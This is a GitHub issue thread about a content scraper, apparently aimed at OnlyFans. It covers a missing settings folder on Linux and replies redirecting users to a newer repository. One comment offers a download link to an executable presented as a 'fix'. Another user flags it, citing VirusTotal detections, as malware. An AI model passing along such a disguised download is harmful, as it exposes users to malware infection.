### ISSUE TITLE
.settings Folder doesn't show.

### ISSUE THREAD

**Issue by DemonWolfFang** [DIGITALCRIMINAL/UltimaScraper#1892]
Hi there. I am running Linux Zorin 16.1 , and I am attempting to run this. However it seems the `.settings` folder isn't showing up. 

I do have Show Hidden Files enabled already, a little help would be appreciated. Thank you!

**Comment by LunarPenguin** [comment]
This version of the program is dead. please go [here](https://github.com/DIGITALCRIMINALS/OnlyFans)

**Comment by DemonWolfFang** [comment]
Thanks!

**Comment by cuenta111** [comment]
can anyone teach me how to use the scraper? i am unable to set it up

**Comment by LunarPenguin** [comment]
> can anyone teach me how to use the scraper? i am unable to set it up

> This version of the program is dead. please go [here](https://github.com/DIGITALCRIMINALS/OnlyFans)

As per my previous answer above.
Please go [here](https://github.com/DIGITALCRIMINALS/OnlyFans)

**Comment by ewhgae457yaefgae4** [comment]
Created a fix for it.
anonfiles com/d379Fe06y3/onlyfansdownloader_exe

**Comment by LunarPenguin** [comment]
> Created a fix for it. <snip>

Please get this shit outta here: https://www.virustotal.com/gui/file/d4057f3054744a3c16ba08a467dedae7aec8678f22d853d2ec729a6b26a23612/detection
